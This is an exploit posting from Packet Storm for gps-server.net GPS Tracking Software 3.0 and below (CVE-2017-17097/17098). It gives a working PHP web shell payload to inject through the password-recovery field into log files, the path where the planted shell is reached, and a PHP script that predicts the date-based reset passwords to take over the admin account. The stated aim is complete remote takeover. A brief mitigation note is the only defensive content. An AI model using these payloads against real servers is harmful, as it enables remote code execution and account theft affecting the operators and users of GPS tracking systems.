exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

gps-server.net GPS Tracking Software 3.0 Code Injection / Password Reset

gps-server.net GPS Tracking Software 3.0 Code Injection / Password Reset
Posted Jan 6, 2018
Authored by Noman Riffat

gps-server.net GPS Tracking Software versions 3.0 and below suffer from remote code injection and password reset vulnerabilities.

tags | exploit, remote, vulnerability
advisories | CVE-2017-17097, CVE-2017-17098
SHA-256 | 30c0124c400a1693d0e840a795c18cda62cc1a17ed81aca850c7e1dbd36eb1da

gps-server.net GPS Tracking Software 3.0 Code Injection / Password Reset

Change Mirror Download
# Exploit Title: GPS-SERVER.NET SAAS CMS <=3.0 Multiple Vulnerabilities
# Exploit Author: Noman Riffat
# Vendor Homepage: http://www.gps-server.net/
# Software Link: http://www.gps-server.net/
# Version: <=3.0
# Tested on: Linux and Windows
# CVE : CVE-2017-17097, CVE-2017-17098

GPS-SERVER.NET SAAS CMS Version <=3.0 Suffers from multiple vulnerabilities
which results in complete takeover of the target remotely.

1. Remote Code Injection (Works until version 3.0)

The writeLog function in fn_common.php in gps-server.net GPS Tracking
Software (self hosted) through 3.0 allows remote attackers to inject
arbitrary PHP code via a crafted request that is mishandled during admin
log viewing. Login, signup and other common incidents are logged into a PHP
file in /logs/ directory with the given input. For example an attacker can
use PHP code in password recovery mode instead of email which will be
injected into the PHP log file.

Demo:

Go to the vulnerable site
Click recover tab
Give following code in email field, fill captcha and click submit
<?php system($_GET[cmd]); ?>
Unfortunately each and every POST request in the CMS is going through
function mysql_real_escape_string() which will add slashes behind every
quote in the payload. So you have to make sure your payload doesn't contain
any quote. Fortunately, PHP is flexible enough to allow a string without
having quotes as you can see in above payload it doesn't contain quotes
around "cmd" but it still works. The shell can then be collected from here
https://localhost/logs/YYYY_MM_user_access.php
YYYY=Current Year
MM=Current Month
Use the payload carefully. If you messed it up, PHP log file will get
corrupted and then wait until next month so CMS generates a new log file
for you :)
Unfortunately the header of log files only allows admin session to access
log data which makes it less of a RCE. Code will only be executed if admin
checks the log files. But fortunately there is another vulnerability
(explained below) which allows an attacker to hijack admin's account hence
making the RCE exploitable with 100% success.

2. Password Reset Vulnerability (Tested upto version 2.7)

gps-server.net GPS Tracking Software (self hosted) 2.x has a password reset
procedure that immediately resets passwords upon an unauthenticated
request, and then sends e-mail with a predictable (date-based) password to
the admin, which makes it easier for remote attackers to obtain access by
predicting this new password. This is related to the use of gmdate()
function for password creation in fn_connect.php.

Demo:

Go to the vulnerable site
Click recover tab
Input admin's email, fill captcha and click submit. Now execute following
PHP code on your local machine immediately.

<?php
for($seconds=-10;$seconds<10;$seconds++){
echo substr(hash('sha1',gmdate('d F Y G i s u',
time()+$seconds)),0,6).'<br>';
}
?>

Submitting password reset form and executing above should be done parallel
to predict password as close as possible. Unfortunately i couldn't make
full remote exploit because of the captcha in the password reset form. This
code will predict possible 20 passwords generated in 20 seconds. It might
not be possible to have synchronized timing on your local machine and
target's server so this code generates 20 passwords (10 before actual time
and 10 after). Set your local machine's time as accurate as you can to get
the perfect combo :)
Password reset vulnerability is tested up to version 2.7 but doesn't work
on version 3.0 which means it was fixed somewhere in between version 2.7
and 3.0 and since the CMS isn't open source so I can't say when it got
fixed (I only had source code of version 2.5.9 and 2.7). Even though the
reset vulnerability was patched unintentionally as developers added a
mid-step in password reset procedure. CMS sends password reset link to the
admin's email and password is only reset once admin clicks the link. Since
we don't know when admin is gonna click the link so we can't predict the
new password.

Mitigation: Update CMS to version 3.1

Give me feedback @nomanriffat :)

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close